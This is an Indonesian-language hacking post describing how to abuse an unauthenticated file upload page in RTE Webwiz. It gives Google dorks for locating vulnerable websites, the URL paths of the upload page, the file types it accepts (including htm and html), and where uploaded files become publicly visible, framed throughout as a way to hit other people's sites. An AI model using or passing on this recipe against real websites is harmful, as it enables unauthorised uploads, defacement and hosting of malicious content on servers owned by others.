RTE Webwiz File Upload Vulnerability
Januari 13, 2021
RTE Webwiz Upload Vulnerability
Dork :
inurl:"/my_documents/my_files/"
inurl:"RTE_popup_file_atch.asp"
inurl:"RTE_popup_file_atch.asp"
Lanjut caranya :
1. masukan dork di atas ke om google
2. buka salah satu target lalu ganti urlnya (khusus dork yg pertama, kalo make yg kedua tinggal upload) menjadi :
-target.com/RTE_popup_file_atch.asp
-target.com/rte/RTE_popup_file_atch.asp
-target.com/admin/RTE_popup_file_atch.asp
3. maka akan nampak seperti ini :
4. upload file dengan ext : zip, rar, doc, pdf, txt, rtf, htm, html, gif, jpg, png,
5. liat hasilnya di :
target.com/my_documents/my_files/filemu
atau liat aja di sebelah kanan, ada alamat url ama previewnya
Sc:lastc0de